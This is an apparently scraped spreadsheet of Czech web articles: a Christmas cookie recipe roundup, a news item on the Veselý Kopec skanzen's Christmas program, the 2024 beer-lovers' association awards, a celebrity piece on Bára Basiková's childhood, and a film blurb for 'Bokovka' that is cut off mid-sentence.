dortíčky, jak se také nazývají, patří sice mezi trochu pracnější, zato mezi nejoblíbenější . Lahodný krém, čokoládová poleva a křehké těsto vás ohromí. Čas přípravy: 2 hod 30 min Obtížnost: Střední Išelské cukroví Išelské cukroví nebo také Išlské dortíčky je trochu náročnější na přípravu, ale na talíři zmizí většinou jako první. Tohle křehké těsto s lahodnou krémovou náplní polité čokoládou a s půlkou oříšku na vrcholu je přímo famózní. Išelské cukroví Crinkles Hit posledních let , který se proslavil na sociálních sítích. To jsou crinkles. Uvnitř se ukrývá vláčné těsto podobné brownies, na povrchu pak křupavá zasněžená kůrka. Věříme, že se k tomu receptu budete rádi vracet. Čas přípravy: 1 hod 30 min Obtížnost: Střední Crinkles Crinkles jsou chutí i strukturou podobné brownies. Pod křupavou popraskanou kůrkou, která vypadá jako zasněžená, se ukrývá vláčné měkké těsto rozplývající se na jazyku. Tento čím dál tím populárnější druh vánočního cukroví si zamilujete a budete je chtít péct celoročně. Crinkles Zázvorky Cukroví, které provoní celý dům zázvorem, bylo oblíbené především v dřívějších dobách. Objevte jeho kouzlo i vy. Čas přípravy: 1 hod Obtížnost: Snadný Zázvorky Zázvorky jsou tradičním druhem cukroví, které především v dřívějších dobách nesmělo chybět na štědrovečerním stole. Nejenže nádherně provoní dům zázvorem, jejich jemně pikantní chuti neodoláte. Zázvorky Marokánky Cukroví, které k nám proniklo z arabského světa a usadilo se i v našich končinách. Křupavé marokánky polité čokoládou si najdou místo i na vaší vánoční tabuli. Čas přípravy: 1 hod Obtížnost: Snadný Marokánky Marokánky patří mezi oblíbené vánoční cukroví. Původně pocházejí z arabské kuchyně, což ale málokdo ví. Jsou krásně křupavé, voní po pomerančích a jejich výroba je vážně snadná. Marokánky Sádlové koláčky Sádlové koláčky mají v Česku dlouhou tradici. A právem. Jejich přípravu zvládne i malé dítě a vyjdou na pár korun. Čas přípravy: 30 min Obtížnost: Snadný Sádlové koláčky Sádlové koláčky s marmeládou nebo s mandlí patří mezi tradiční české cukroví. Jejich základem je jednoduché těsto se sádlem a příprava je tak snadná, že ji zvládnou i malé děti. Sádlové koláčky Opilý Izidor Pro milovníky opilého cukroví máme taky něco na zub. Opilý Izidor obsahuje nemalé množství alkoholu a jeho příprava nepatří mezi nejsnadnější, výsledek však rozhodně stojí za to . Lahodný krém a ořechová vrstva udělá z obyčejného cukroví nevšední zážitek. Čas přípravy: 1 hod 15 min Obtížnost: Střední Opilý Izidor Opilý Izidor, opilý František nebo také opilé řezy je vynikající vánoční cukroví s vlašskými ořechy, které ovšem rozhodně není pro děti. Jak už název této dobroty napovídá, obsahuje totiž ne zrovna zanedbatelné množství alkoholu . Chutná však přímo božsky, rozhodně tedy stojí za vyzkoušení. Opilý Izidor Vinné cukroví Nadýchané cukroví jen ze tří surovin? Vinné cukroví paří mezi nejjednodušší a nejrychlejší na světě. Navíc se dá připravit i ve slané variantě. Čas přípravy: 1 hod Obtížnost: Snadný Vinné cukroví Vinné cukroví patří mezi tradiční vánoční dobroty a na svátečním stole zmizí během chvilky. Skládá se pouze ze tří ingrediencí, jeho příprava je tedy velmi rychlá a jednoduchá. V troubě se cukroví krásně nafoukne a poté stačí jen obalit v cukru. Vinné cukroví Kokosky Kokosky patři mezi klasiku, která se rozhodně mezi ostatním cukrovím neztratí. Příprava je jednoduchá a výsledek luxusní. Vyzkoušet můžete také zdravé varianty bez cukru nebo s tvarohem. Čas přípravy: 50 min Obtížnost: Snadný Kokosky Kokosky patří k těm druhům cukroví, které budete milovat už od útlého dětství. Recepty na kokosky si obvykle postačí pouze se třemi surovinami: S bílky, cukrem a kokosem. Příprava je rychlá a nenáročná, tak si je pojďte s námi vyzkoušet. Kokosky Čas přípravy: 30 min Obtížnost: Snadný Low carb tvarohové kokosky Pojďte si s námi připravit zdravé low carb tvarohové kokosky, které vás ohromí svou chutí. Recept je rychlý a velmi jednoduchý, takže si ho jistě oblíbíte. A pokud chcete a trochu toho cukru snesete, můžete si je ozdobit čokoládou. Low carb tvarohové kokosky Čas přípravy: 40 min Obtížnost: Snadný Kokosky bez cukru Kokosky bez cukru potěší zajisté všechny, kteří nemohou nebo nechtějí do svého jídelníčku zařadit cukr. Jejich příprava je navíc velmi snadná, zkuste si je tedy na Vánoce připravit. Kokosky bez cukru Biskupský chlebíček Tradiční český moučník, který se peče hlavně na Vánoce. Spojení nadýchaného těsta, kandovaného ovoce a čokoládové polevy vás ohromí. Čas přípravy: 1 hod 30 min Obtížnost: Snadný Biskupský chlebíček s kandovaným ovocem Biskupský chlebíček patří mezi oblíbené vánoční zákusky, a to především v anglicky mluvících zemích. Díky kombinaci těsta, kandovaného ovoce a čokolády je krásně barevný, zároveň vydrží dlouho vláčný. Jeho příprava je přitom naprosto jednoduchá. Biskupský chlebíček s kandovaným ovocem Nepečené vánoční cukroví Nemáte čas se zabývat zdlouhavým pečením? Pak vyzkoušejte naše tipy na nepečené cukroví, se kterým si rozhodně ostudu neutrhnete. Lanýže, vosí hnízda, rumové kuličky patří mezi nejoblíbenější cukroví a věříme, že i u vás doma se po nich jen zapráší. Čokoládové lanýže Famózní záležitost, která uspokojí i ty nejnáročnější labužníky ! Objevte náš recept na lanýže jen ze dvou ingrediencí. Pro milovníky kvalitní hořké čokolády pak máme našlehané lanýže s likérem, které vám učarují. Čas přípravy: 40 min Obtížnost: Snadný Čokoládové lanýže ze salka Tyto čokoládové lanýže zvládnete připravit jen ze dvou ingrediencí, potřebujete pouze plechovku kondenzovaného mléka a kakao. Výsledek je ale nad očekávání famózní a garantujeme, že u jednoho kusu rozhodně nezůstanete. Lanýže jsou také skvělý způsob, jak zužitkovat zbytek salka, které vám zbylo z předchozího pečení. Čokoládové lanýže ze salka Čas přípravy: 1 hod Obtížnost: Snadný Domácí čokoládové lanýže Čokoládové lanýže, to je dokonale jemná našlehaná náplň z lahodné hořké čokolády, zahalená do tenoučké krusty kakaového prášku. Příprava této celosvětově oblíbené vánoční delikatesy je navíc velmi jednoduchá. Domácí lanýže pak můžete obalit v kakau, kokosu, sekaných mandlích nebo třeba oříšcích. Domácí čokoládové lanýže Vosí hnízda Vosí hnízda, nebo chcete-li včelí úly, patří mezi typické nepečené cukroví, které nikdy nezklame. Jejich přípravu však raději nechte na poslední chvíli , dlouho totiž nevydrží. Čas přípravy: 2 hod Obtížnost: Snadný Vosí hnízda Vosí hnízda patří k nepečeným druhům vánočního cukroví, které si můžete připravit těsně před svátky. Příprava je rychlá a jednoduchá. Vosí hnízda Donuty z hořké čokolády Křupavé donuty jsou trošku netradiční, ale lahodné cukroví. Připravte si je s křupavou quinoou (případně burizony nebo pufovanou rýží) a kvalitní hořkou čokoládou. Garantujeme, že výsledek bude naprosto delikátní. Čas přípravy: 15 min Obtížnost: Snadný Donuty z hořké čokolády Křupavé čokoládové donuty, to je lahodná pochoutka, kterou zvládne připravit každý. Tyto dobroty ve tvaru koblížků jsou ideální, když máte chuť na něco sladkého, ale nechcete péct nebo dělat nic moc složitého. Donuty z hořké čokolády Kuličky Nepečené kuličky na tisíc způsobů nemohou o Vánocích chybět. Zkusíte rumové s kokosem, medovníkové nebo a lá Raffaelo? Čas přípravy: 20 min Obtížnost: Snadný Nepečené ovesné kuličky Ovesné kuličky s rozinkami patří mezi to nejjednodušší nepečené vánoční cukroví vůbec. Do jeho přípravy tedy můžete bez obav zapojit i děti. Nepečené ovesné kuličky Čas přípravy: 1 hod 20 min Obtížnost: Snadný Čokoládovo-ořechové kuličky Čokoládovo-ořechové kuličky připravíte během chvilky, protože patří mezi nepečené vánoční cukroví, navíc výtečně chutnají. Jejich základem je karamelové kondenzované mléko a dětské piškoty. Čokoládovo-ořechové kuličky Čas přípravy: 20 min Obtížnost: Snadný Kokosové kuličky bez cukru Kokosové kuličky bez cukru jistě přijdou vhod všem, kdo nechtějí nebo nemohou jíst cukr, zároveň si ale nedovedou představit sváteční atmosféru bez tohoto druhu cukroví. Příprava kuliček je velmi jednoduchá a rychlá, můžete tedy s klidem zapojit i děti. Kokosové kuličky bez cukru Čas přípravy: 2 hod 30 min Obtížnost: Snadný Medovníkové kuličky Medovníkové kuličky si vychutnáte jako vánoční cukroví i kdykoli jindy během roku. Jsou tak dobré, že zmizí ze svátečního stolu jako první a jejich příprava je jednodušší, než byste čekali. Medovníkové kuličky Čas přípravy: 45 min Obtížnost: Snadný Rumové kuličky s kokosem Rumové kuličky s kokosem patří mezi nejoblíbenější nepečené vánoční cukroví. Kuličky krásně voní rumem a budete je mít hotové během chvilky. Rumové kuličky s kokosem Čas přípravy: 30 min Obtížnost: Snadný Jednoduché Raffaello kuličky Jednoduché Raffaello kuličky jsou jeden z nejoblíbenějších nepečených druhů cukroví, navíc je budete mít hotové během chvilky. Stačí vám jen kondenzované mléko, strouhaný kokos a pár minut času na tvarování. Díky tomu, že jde o nepečené cukroví, je můžete připravit až na poslední chvíli. Jednoduché Raffaello kuličky Kávová zrna Milovníci kávy se na Vánoce určitě neobejdou bez kávových zrn. Toto retro cukroví si místo na vašem vánočním stole bezesporu najde. Čas přípravy: 1 hod 30 min Obtížnost: Snadný Kávová zrna Kávová zrna patří mezi oblíbené cukroví, které se připravuje nejen o Vánocích. Zrna jsou velmi lahodná, sladká a hlavně jednoduchá na přípravu. Kávová zrna Kokosová roláda Kokosová roláda je rychlovka, která se vám bude hodit. Stihnete ji, i když nemáte na cukroví moc času. Nechte ji ale radši na období těsně před Vánoci. Čas přípravy: 1 hod Obtížnost: Snadný Kokosová roláda Nepečená kokosová roláda je vynikající záležitost, kterou jistě znáte ze svátečně prostřeného stolu s vánočním cukrovím u vašich babiček. Příprava rolády je velmi snadná a nezabere moc času, můžete si ji tedy s klidem nechat až na konec těsně před Vánocemi. Kokosová roláda Zdroj: Kupi.cz Diskuze Diskutovat recept pečení vánoce cukroví sladké vánoční cukroví nepečené cukroví</t>
  </si>
  <si>
    <t>333420</t>
  </si>
  <si>
    <t>20241201_105_3477614881_183eef740f10293e3e5b.html</t>
  </si>
  <si>
    <t>183eef740f10293e3e5b</t>
  </si>
  <si>
    <t>Začaly Vánoce ve skanzenu Veselý Kopec, vrcholem bude jarmark 8. prosince</t>
  </si>
  <si>
    <t>Začaly Vánoce ve skanzenu Veselý Kopec, vrcholem bude jarmark 8. prosince 1. prosince 2024 14:24 ilustrační snímek | foto: Metro.cz Skanzen Veselý Kopec u Hlinska na Chrudimsku o víkendu zahájil vánoční týdenní program. Jeho vrcholem bude v neděli 8. prosince vánoční jarmark za účasti vybraných řemeslníků z celé České republiky . V sobotu na zahájení programu přijelo téměř 600 lidí, dnes byla ve vánočně vyzdobeném skanzenu a jeho roubenkách mikulášská obchůzka. ČTK to řekla Ilona Vojancová z Muzea v přírodě Vysočina, které skanzen spravuje. "S návštěvou na začátek vánočního programu jsme spokojeni," řekla Vojancová . Loni návštěvnost srazilo sněžení a ledovka, kdy kvůli špatně sjízdným silnicích do skanzenu na zahájení programu přijelo jen asi 300 lidí. O tomto víkendu panovalo na Veselém Kopci převážně slunečné počasí, sjízdnost byla bez omezení. Letos je vánoční program ve skanzenu zaměřený na tradice a obyčeje spojené se Štědrým dnem, Božím hodem vánočním a Štěpánem v období od poloviny 19. století do poloviny 20. století. Po celý týden budou řemeslnici ve skanzenu vyrábět různé vánoční předměty. "Lidé uvidí například výrobu tlačených perníků, malování skleněných ozdob, výrobu korálkových nebo slaměných ozdob," řekla Vojancová . Na program na Veselém Kopci muzeum naváže od 11. prosince do 12. ledna programem v památkové rezervaci Betlém v Hlinsku . Lidé v něm poznají atmosféru vánočních obyčejů v období od poloviny 19. století do 30. let 20. století. Zjistí, na jaké dárky se mohly děti pod vánočním stromečkem těšit a jaké pokrmy nesměly chybět na štědrovečerním stole před 100 lety a proč. Součástí výstavy budou i betlémy lidových tvůrců ze sbírek muzea. Vystavený bude i zajímavý betlém pašijový či betlémy zhotovené ze slámy, papíru a těsta. Skanzen Veselý Kopec od roku 1972 přibližuje život drobných řemeslníků a zemědělců v 19. a 20. století. Má zhruba 30 objektů, kromě mlýna například olejnu a pilu, sušičku lnu a ovoce, polygonální stodolu se šindelovou střechou či výměnek. Jediná původní je usedlost U Pilných, která je ze 17. století. Muzeum v přírodě Vysočina je nejnavštěvovanější památkou v Pardubickém kraji , ročně do něj zavítá asi 70.000 lidí. Autor: ČTK Témata: Okres Chrudim | Aktuální zprávy, články a informace Sdílet na Facebooku Sdílet na síti X Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>20241201_106_3477083387_2f0f31f7e51499c98f64.html</t>
  </si>
  <si>
    <t>2f0f31f7e51499c98f64</t>
  </si>
  <si>
    <t>Výsledky ankety Sdružení přátel piva o nejlepší piva a pivovary roku 2024</t>
  </si>
  <si>
    <t>Výsledky ankety Sdružení přátel piva o nejlepší piva a pivovary roku 2024 Sdružení přátel piva vyhlašuje i v tomto roce výsledky své tradiční soutěže o nejlepší piva , pivovary a pivovarské osobnosti roku (a to nepřetržitě již od roku 1990). V současné době jde o jedinou (a nejstarší) celorepublikovou pivní soutěž samotných spotřebitelů. Výjimečný je i systém hodnocení, který kombinuje anketní a degustační část, kdy piva s nejvyšším počtem získaných hlasů v rámci ankety postupují do anonymní odborné degustace, ze které vyjde konečné pořadí na prvních místech. Soutěž SPP prošla za celou dobu řadou různých drobných změn, které reflektovaly především aktuální trendy v pivovarském světě. Dle toho se měnily vyhlašované pivní kategorie (bez rozšiřovaní soutěže). S výjimkou ceny Létající pivovar roku, která přibyla v roce 2022 a kterou má SPP chráněnou na Úřadě průmyslového vlastnictví, stejně jako ceny Pivovar roku a Minipivovar roku. Došlo tak k logickému uzavření celé řady těchto ocenění. Sdružení přátel piva však chystá na příští rok inovovaný formát soutěže, zachovávající stále kombinaci anketní a degustační části, ale půjde o průběné celoroční hodnocení, které bude lépe reflektovat sezónní nabídku piv a dokáže zachytit případné výkyvy v kvalitě piva . Sdružení přátel piva (SPP) své ceny od roku 2002 vyhlašuje tradičně pokaždé v jiném kraji, v jiném pivovaru. Letos bylo zvoleno jako místo konání město Nepomuk (s pivovarem Zlatá kráva) v plzeňském kraji , kde se udílení těchto cen ještě nekonalo, čímž SPP splácí dluh tomuto pivovarskému kraji. Finální anonymní degustace anketně nejúspěšnějších piv proběhla pod vedením lektora ČZU a odborného degustátora SPP PhDr. Ing. Tomáše Maiera, Ph.D. v neveřejných prostorách Strahovského pivovaru dne 19. září 2024. V anketní části hlasovalo cca 47 % členů SPP pro různých 259 značek piva . Pivní počin roku (jako jedna z tradičních cen SPP) dle verdiktu poroty letos nebude udělen. V letošním roce dokázalo ve své (pivní) kategorii obhájit vítězství pouze pivo Volt z Jablonce n. N. a to v kategorii světlých, svrchně kvašených piv . Toto pivo zároveň mělo i nejlepší známku ze všech anonymně degustovaných vzorků napříč všemi kategoriemi. Celkově nejúspěšnějším pivovarem v naší soutěži se letos zcela jednoznačně stal (nepřekvapivě) Rodinný pivovar Bernard , se čtyřmi umístěními a zároveň obhájil titul Pivovar roku. Vítězným pivem v anketní části napříč kategoriemi se stal Černý ležák Bernard, s jemnými kvasnicemi – z Rodinného pivovaru Bernard , které získalo 295 hlasů. Anonymní odborná degustace však toto pivo odsunula až na druhé místo. Skokan roku: Raspberry Sorbet – z pivovaru Sibeeria, v kategorii kyselých piv . (Ač jde o pivo poprvé uvařené již v roce 2020). Zajímavostí je i zcela shodné pořadí na prvních třech místech v anketě Pivovar roku, což se stalo v historii naší soutěže zcela poprvé. Sdružení přátel piva a jeho anketa Pivo roku Anketa Sdružení přátel piva o nejlepší piva , pivovary a pivovarské osobnosti roku je nejstarší novodobou soutěží na českém pivním trhu (s tradicí již od roku 1990). Od roku 2008 (po zániku Pivního kurýra) je to i jediná celorepubliková spotřebitelská soutěž. Systém, kterým SPP dojde ke svým výsledkům, je dvoukolový a zcela originální, neboť spojuje oba prvky většiny soutěží, tedy anketní a degustační část. Vítězná piva se tak vyznačují kombinací oblíbenosti a kvality. První část hodnocení je anketní. Pivní sněm SPP v průběhu první poloviny roku oznámí členské základně kategorie, ve kterých se bude ocenění v daném roce udílet, poté následuje hlasování všech členů. Hlasy jsou vedením SPP shromažďovány a po jejich zpracování vzniká v každé kategorii pořadí dle oblíbenosti. V druhé části hodnocení posoudí členové Pivního sněmu SPP ta piva , která se umístila v hlasování členů SPP na prvním až pátém místě a určí jejich konečné pořadí formou odborné anonymní degustace, na jejíž průběh dohlíží a účastní se jí nezávislí pivovarští odborníci, kteří o průběhu této degustace vystavují veřejný protokol. Degustační část je hodnocením z hlediska kvality piv . Členové Pivního sněmu SPP (mnozí s odbornými degustačními zkouškami) mají možnost se v průběhu roku také objektivněji seznámit se sortimentem piv vařených v pivovarech v České republice , které navštěvují, degustují pivní „vzorky“, pořádají anonymní ochutnávky a moderované degustace a účastní se i ostatních pivních prezentací. O vítězích v kategorii Sládek roku a Pivní počin roku rozhoduje pouze porota Pivního sněmu SPP. Ke dni 14. 11. 2024 mělo Sdružení přátel piva 1 567 registrovaných právoplatných členů. Nejvíce členů je v Praze (40 %), nejméně v Karlovarském kraji (0,8 %). Od roku 2005 je SPP členem EBCU ( Evropské unie pivních spotřebitelů. Letošní výsledky: Světlé výčepní pivo Naše legislativa výčepní pivo bere jako sedmičku až desítku, nicméně běžný spotřebitel toto chápe spíše jako desítku. Z vyhlašovaných kategorií je právě tato vůbec pro sládka nejtěžší – spodně kvašené desítce se neodpustí vůbec nic. Každá mírná chyba při výrobě se hned negativně projeví na chuti. Právě podle pravé české desítky se pozná mistr sládek. 1. Bernard Desítka / Rodinný pivovar Bernard 2. Fabián 10 / Pivovar Hostomice 3. Únětické pivo 10° / Únětický pivovar Světlý ležák Světlým ležákům pro změnu nikdo v hospodě neřekne jinak než dvanáctka a nepochybně se v českých podmínkách jedná o nejprestižnější „Královskou“ kategorii. V této kategorii letos nastává naprosto výjimečná situace, kdy první a třetí místo putuje do stejného, nám už velice dobře známého pivovaru. 1. Sváteční ležák s jemnými kvasnicemi / Rodinný pivovar Bernard 2. Bad Flash Prostě Ležák 12°/ Pivovar BadFlash 3. Bernard Dvanáctka / Rodinný pivovar Bernard Silné pivo Charakteristika silného piva je velice jednoduchá – vše, co má více jak 13 % EPM. V našem pojetí soutěže pak jde především o světlá piva . Na rozdíl od předchozích kategorií, na stupních vítězů této, máme samé nové značky. 1. F. L. Věk / Pivovar Rampušák 2. Uzený Bock bez kosti 16°/ Pivovar Mazák 3. AXIOM Gonza Pale Ale / Pivovar Axiom Tmavé /polotmavé, spodně kvašené pivo Tato kategorie je brána bez rozlišení stupňovitosti, jedná se o jakákoliv barevná, spodně kvašená piva . U nás dnes příliš velký podíl na trhu nemají (cca 3,5 %), ale ještě po druhé světové válce se pila více než hojně. Vítězné pivo se ale v daném pivovaru pije skutečně hodně, je ve stálé nabídce. 1. Svatý Norbert Dark lager / Pivovar Strahov 2. Černý ležák s jemnými kvasnicemi / Rodinný pivovar Bernard 3. PRVNÍ DÁMA / Pivovar Ovipistán Pšeničné pivo I tuto kategorii vyhlašuje SPP bez rozdílu stupňovitosti, a dokonce bez rozdílu barvy, nicméně tmavá či polotmavá pšeničná piva jsou u nás, ale i ve světě výrazně v menšině. Tento pivní styl pochází původně ze středověkých Čech , a ještě před dvěma staletími u nás byl naprosto běžný, aby pak zcela vymizel. Teprve v posledních letech opět zažívá svůj nástup. 1. PRIMÁTOR WEIZEN, pšeničné / Pivovar PRIMÁTOR 2. Zvíkovský Rarášek / Pivovarský dvůr Zvíkov 3. 12 Sv. Jana Nepomuckého , PŠENICE / Pivovar Zlatá kráva Světlé, svrchně kvašené pivo Do této kategorie spadají veškerá světlá, svrchně kvašená piva , (s výjimkou pšeničných piv ), opět bez rozdílu stupňovitosti. Kategorie plná pivních stylů ve zkratkách jako IPA, APA, nověji NEIPA apod., ale také třeba belgických klášterních piv a jiných. 1. Volt Baterka / Pivovar Volt 2. PRIMÁTOR IPA / Pivovar PRIMÁTOR 3. 14 Tractor IPA / Pivovar Zlatá kráva Tmavé /polotmavé, svrchně kvašené pivo Kategorie, jakkoliv barevných, svrchně kvašených piv bez rozdílu stupňovitosti. Vesměs se tak jedná o Portery, Stouty či barevná piva typu Ale. Letos na nejvyšší stupeň dosáhl pivovar Permon se svým exkluzivním barikovaným pivem v sudu od jamajského rumu. 1. The Darkness / Pivovar Permon 2. BLACKOUT 16° / Pivovar Volt 3. Torpid Mind 24° / Pivovar BadFlash Kyselé pivo Kyselé pivo neznamená zkyslé pivo a jde o kategorii piv , vzniklých spontánním či mléčným kvašením, s nízkým pH, mezi 3,0-4,5. Kyselá piva bývají znalci vyhledávána a produkují se v mnoha částech světa, největší věhlas jim přinesla Belgie . Všeobecně jde o piva , která za poslední roky zažívají největší Boom na trhu. Letos vyhrává konkrétně styl Berliner Weisse, kterému se přezdívá šampaňské severu. 1. Raspberry Sorbet / Pivovar Siberria 2. Tears of St. Laurent (2020) / Pivovar Wild Creatures 3. Ich Bin Ein Berliner / Pivovar MadCat Létající pivovar roku Na světě existuje několik pivovarů, které jsou umístěné na lodi, ostatně jedna taková loď s pivovarem kotví i na Vltavě . Nicméně to s kategorii létajících pivovarů nesouvisí. Jedná se o výrobce piva , který nedisponuje vlastním výrobním zařízením, vlastní pouze svoji značku a potažmo i recepturu, a proto si své várky vaří v pronajatých pivovarech. Pro pivovarský trh jsou tyto pivovary neskutečně důležité, protože to často bývá jakýsi předstupeň, než si majitel značky pořídí vlastní technologii. SPP tuto kategorii vyhlašuje teprve potřetí. K dnešnímu dni u nás existuje na 150 létajících pivovarů. Pivovar Chroust uhájil své prvenství a získal k tomu i chráněný titul Létající minipivovar roku. 1. Pivovar Chroust 3. Pivovar Hangár Minipivovar roku Díky registraci na Úřadu průmyslového vlastnictví má Sdružení přátel piva jako jediný subjekt u nás, právo udílet titul Minipivovar roku (a to od roku 2006). Jedná se o pivovarské provozy s roční produkcí do 10 tisíc hektolitrů piva . Vítězství v této kategorii je stále obtížnější, konkurence každým rokem roste. Letos vzniklo 15, loni 22 minipivovarů. Celkově jejich víc jak 600, jen v Praze jich je 51. Letošní vítěz byl otevřen v roce 2000, navíc v naší soutěži neboduje poprvé a je řazen mezi nejúspěšnější české pivovary vůbec. 1. Pivovar Strahov 3. Pivovar jejich víc Pivovar roku I v této kategorii je SPP u nás jediným subjektem, který takto oceňuje průmyslové pivovary (s ochrannou známkou od roku 2004). Počet pivovarů donedávna klesal, ale jak se mnohé minipivovary stávají natolik úspěšnými, že výstavem přesahují již hranici roční produkce ve výši 10 000 hl, tak se stávají pivovary průmyslovými a počet tak opět narůstá. Letošní vítěz obhájil své prvenství z loňského roku, přičemž např. v roce 1991 přežil svoji klinickou smrt, kdy byl novými majiteli zprivatizován 5 minut po dvanácté. Další významný zlom pro náš oceněný pivovar byl rok 2001, kdy do něj vstoupil belgický strategický investor, který přinesl další exponenciální rozvoj. 1. Rodinný pivovar Bernard 2. Pivovar KAMENICE NAD LIPOU 3. Únětický pivovar Sládek roku Cenu sládek roku udílí SPP buď za mimořádné výkony v daném roce anebo naopak, jde o ohodnocení celoživotního díla ve prospěch českého pivovarnictví. Tak tomu je i letos, kdy se Sdružení přátel piva rozhodlo ocenit opravdovou legendu z velkého pivovaru, dokonce z toho největšího. Letošní laureát pochází z typické pivovarské rodiny, váženými pivovarskými odborníky bývali už jeho otec a dědeček. Už v předškolním věku našeho letošního laureáta fascinovaly otevřené kvasné nádoby a chodby a sklepy vytesané do žulové skály. Pivo prvně ochutnal, ostatně jako většina z nás, ve druhé třídě, když ho nesl ve džbánku z hospody. Nicméně každý takovýto pivní začátečník odlízne jen trochu pěny, a to zrovna senzorický zážitek nebývá nejlepší, i pro našeho letošního laureáta to bylo něco nezajímavého a hodně hořkého. Pivo mu prý začalo chutnat až ve čtvrté třídě, když se vyvaroval těchto začátečnických chyb a konečně si dal pořádný doušek. Čas plynul a náš letošní laureát si prošel asi tou nejtypičtější studijní kariérou – nejprve potravinářská průmyslová škola v Podskalské a následně VŠCHT, samozřejmě vše prokládané praxí. Prošel si snad všemi tehdy funkčními Západočeskými pivovary, jmenujme aspoň Chodovou Planou, Domažlice , Cheb , Stod , Karlovy Vary a samozřejmě Gambrinus a Prazdroj. Věčná škoda, že řada z těchto pivovarů již zanikla. V pivovarech si prošel veškerou praxí od vidrování na humnech, po varnu a spilku, až po stáčírnu. Nezůstal ale jen na českém dvorečku, působil v pivovarech v USA a Africe , ale i ve slavném irském pivovaru Guinness, a od té doby má irský stout hned za českým ležákem coby druhý nejoblíbenější pivní styl. Nepohrdne také bavorským pšeničným pivem . V posledních letech se hodně věnoval školení výčepních dle hesla: „ sládek pivo vaří, ale výčepní ho dělá “, protože všichni víme, jak mizerný hospodský může i špičkové pivo proměnit v nepitelný patok. Letošním laureátem se stává Václav Berka z plzeňského pivovaru Prazdroj. Jaromír Hampl</t>
  </si>
  <si>
    <t>475</t>
  </si>
  <si>
    <t>20241201_107_3477060360_dab47fdec1eb12f49281.html</t>
  </si>
  <si>
    <t>dab47fdec1eb12f49281</t>
  </si>
  <si>
    <t>Složité dětství Báry Basikové: Matka ji nechtěla. Neuměla mě obejmout ani pohladit, říká zpěvačka</t>
  </si>
  <si>
    <t>Složité dětství Báry Basikové : Matka ji nechtěla. Neuměla mě obejmout ani pohladit, říká zpěvačka Oblíbená zpěvačka Bára Basiková si v sobě nese velké trauma z dětství. Matka jí neuměla dávat najevo lásko a Basiková měla celý život pocit, že je nechtěné dítě. Jednašedesátiletá zpěvačka Bára Basiková se narodila v době, kdy bylo její mamince Daniele teprve osmnáct let. Dítě vůbec neplánovala, chtěla si ještě užívat, měla spoustu nápadníků, ze kterých nejspíš stále hledala toho pravého. „ Můj táta o ni velmi usiloval, byl o deset let starší, tak si ji tak pojistil,“ prozradila Basiková pro iDnes. Rodina byla proti potratu Její maminka si tak vůbec nedokázala představit, jak bude dítě vychovávat. Měla v plánu si ho nechat vzít, ale proti tomu se postavila celá její rodina. „Ona se ráda bavila, měla milence, ráda se napila, tancovala. Podle mě neměla být nikdy matka,“ uvedla Basiková svůj názor. I když se na to dnes dokáže dívat s nadhledem, na dětství nemá ty nejlepší vzpomínky. Maminka jí neustále opakovala, že jí zkazila život. „Nikdy mě neuměla pohladit, obejmout nebo mi dát pusu. Ale jinou mámu jsem neměla, tak jsem to brala, jak to přicházelo,“ popsala smutné zážitky. Bára i tak maminku bezmezně milovala. Věřila, že se to zlomí a dočká se mateřské lásky, jenže místo toho ji matka odložila k babičce. Basiková si tak dodnes pamatuje z dětství hlavně zážitky s otcem a babičkou. Postupně se to nezlepšovalo, spíš naopak Basiková si v podcastu Bereniky Kohoutové také vzpomněla, že když měli doma rozbitou pračku, tak se její maminka vyspala s opravářem. „Byla kočka a chlapi z ní šíleli,“ vzpomíná . Zpěvaččin otec tak brzy pochopil, že svou manželku nedokáže zkrotit. Začal z toho být nešťastný a útěchu hledal na dně sklenky s alkoholem . Když bylo Báře Basikové třináct let, její rodiče se rozvedli a bouřlivé období její maminky pokračovalo. Střídala různé muže, nedokázala mít jen jednoho. V té době už Basiková pomalu začínala se zpěvem, ale podpory od matky se jí nedostávalo. Jejich vztah byl i nadále chladný. „S mou doktorkou jsme došly k tomu, že jsem depresemi trpěla už jako dítě . No ale to se tenkrát vůbec neřešilo – nějaké deprese. A nikdo se dítěte neptal, jaké má pocity nebo potřeby. Děti tenkrát držely hubu a krok, to byla taková doba,“ popsala Basiková v talkshow Miluše Bittnerové Na kafeečko. Ani jako babička za moc nestála Když se poté narodily Basikové vlastní děti, ani k nim neměla její maminka prakticky žádný vztah. Vlastně ho ani nechtěla, neuměla si na ně udělat čas. Zpěvačka ale alespoň celý život viděla, jak by se jako matka neměla chovat a od začátku se snažila k výchově přistupovat úplně jinak. „Jsem úplně jiná povaha, jiný typ člověka, než byla moje maminka, a v životě to mám poskládané úplně jinak,“ uvedla v minulosti pro web Prima ženy. Sama Bára Basiková měla první děti až v devětadvaceti letech, v té době si je navíc moc přála. Snažila se jim tak dávat od začátku najevo, jak moc je miluje. „Celá výchova mých dětí se tak odehrávala v úplně jiných dimenzích, než byl můj vztah s mámou. Myslím, že to je dané, že to člověk dělá naprosto instinktivně,“ popsala . K usmíření za života její maminky nikdy nedošlo. Bára Basiková ženě, která ji přivedla na svět, odpustila až v okamžiku, kdy odešla na věčný odpočinek. „ Bylo to když ležela v rakvi a držela jsem ji za ruku. Teprve tehdy jsem to dokázala říct. Protože my jsme si nikdy nerozuměly a nikdy jsme se nesblížily,“ dodala . Zdroje: idnes.cz , zeny.iprima.cz , lifee.cz , blesk.cz</t>
  </si>
  <si>
    <t>20241201_108_3477252452_ba935e6cba3579918f1f.html</t>
  </si>
  <si>
    <t>ba935e6cba3579918f1f</t>
  </si>
  <si>
    <t>TADY VARY - BOKOVKA</t>
  </si>
  <si>
    <t>TADY VARY - BOKOVKA Komedie, drama, romantický, USA , 122‘ + úvod, titulky, 180 Kč Miles ( Paul Giamatti ) a Jack ( Thomas Haden Church) jsou dávní a poněkud nesourodí přátelé, kteří se vydávají na týdenní rozlučku se svobodou po vinařské oblasti Santa Ynez Valley. Jejich představy o průběhu výletu jsou ovšem trochu odlišné. Zatímco samotářský Miles by rád společný čas strávil koštováním prémiových kalifornských vín, nastávající ženich Jack by si rád naposledy užil život svobodného mládence se vším všudy. K dobrému pití totiž patří i společnost krásných žen. Do milostných dobrodružství se nakonec zaplétají oba, když se v restauraci seznámí se dvěma okouzlujícími servírkami. Nechávají se strhnout romantickou atmosférou společných večeří, nekonečných rozhovorů a opojným vínem , které však brzy všem ztrpkne na jazyku... Pohodová komedie o životě, přátelství a krizi středního věku se dočkala vřelého diváckého a kritického přijetí. Snímek získal mnoho filmových ocenění a posbíral pět oscarových nominací včetně těch nejprestižnějších za 